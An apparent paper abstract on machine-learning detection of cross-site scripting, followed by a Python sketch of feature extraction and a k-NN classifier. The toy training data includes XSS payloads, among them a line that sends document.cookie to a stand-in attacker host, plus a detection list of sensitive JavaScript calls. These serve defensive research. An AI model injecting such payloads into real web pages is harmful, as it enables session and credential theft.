Detecting Cross-Site Scripting Attacks Using Machine Learning

Cross-site scripting (XSS) is one of the most frequently occurring types of attack on web applications and is therefore an important concern in information security. In an XSS attack, the attacker injects malicious code, typically JavaScript, into a web application so that it executes in the user’s browser. Identifying whether a script is malicious is an important part of defending a web application. This paper investigates the use of SVM, k-NN and Random Forests to detect and limit these attacks, whether known or unknown, by building classifiers for JavaScript code. It demonstrates that a feature set combining language syntax and behavioural features yields classifiers with high accuracy and precision on large real-world data sets, without restricting attention to obfuscation alone.
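As a rough illustration of the approach described above, the following Python sketch turns a JavaScript snippet into a small numeric feature vector and classifies it with a minimal k-NN vote, one of the three classifier families the paper names. The abstract does not list the paper's actual features, so the feature set here (script length, punctuation ratio, count of encoded characters, count of a few sensitive API names), the names `extract_features`, `knn_predict`, `SUSPICIOUS_CALLS` and `TRAIN`, and the six toy training scripts are all assumptions made for illustration only.

```python
import math
import re
from collections import Counter

# Hypothetical list of API names treated as behavioural indicators.
# The paper's real feature set is not given in the abstract.
SUSPICIOUS_CALLS = ("eval", "unescape", "fromCharCode",
                    "document.write", "document.cookie")

# Matches URL-style (%41), hex (\x41) and unicode (\u0041) escapes.
ESCAPE_RE = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")


def extract_features(script):
    """Map a JavaScript string to a small vector of assumed features."""
    n = max(len(script), 1)
    punctuation = sum(1 for c in script
                      if not c.isalnum() and not c.isspace())
    return [
        math.log1p(len(script)),                            # syntax: size
        punctuation / n,                                    # syntax: symbol density
        float(len(ESCAPE_RE.findall(script))),              # syntax: encoded chars
        float(sum(script.count(s) for s in SUSPICIOUS_CALLS)),  # behaviour
    ]


def knn_predict(train, query, k=3):
    """Majority vote among the k training vectors closest to the query.

    Features are left unscaled to keep the sketch short; a real
    pipeline would normally normalise them first.
    """
    nearest = sorted(train, key=lambda item: math.dist(item[0], query))[:k]
    votes = Counter(label for _, label in nearest)
    return votes.most_common(1)[0][0]


# Toy, hand-written training scripts (not data from the paper).
BENIGN = [
    "function add(a, b) { return a + b; }",
    "var total = items.length; console.log(total);",
    "document.getElementById('menu').style.display = 'none';",
]
MALICIOUS = [
    "eval(unescape('%61%6c%65%72%74%28%31%29'));",
    "document.write('<img src=x onerror=' + String.fromCharCode(97,108,101,114,116) + '>');",
    "new Image().src = 'http://evil.example/?c=' + document.cookie;",
]
TRAIN = ([(extract_features(s), "benign") for s in BENIGN]
         + [(extract_features(s), "malicious") for s in MALICIOUS])

print(knn_predict(TRAIN, extract_features("function mul(x, y) { return x * y; }")))
print(knn_predict(TRAIN, extract_features("eval(unescape('%61%6c%65%72%74%28%32%29'));")))
```

Six scripts are far too few to say anything about accuracy or precision. The sketch is only meant to show how syntactic and behavioural signals can share one feature vector that any of the named classifiers could consume.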
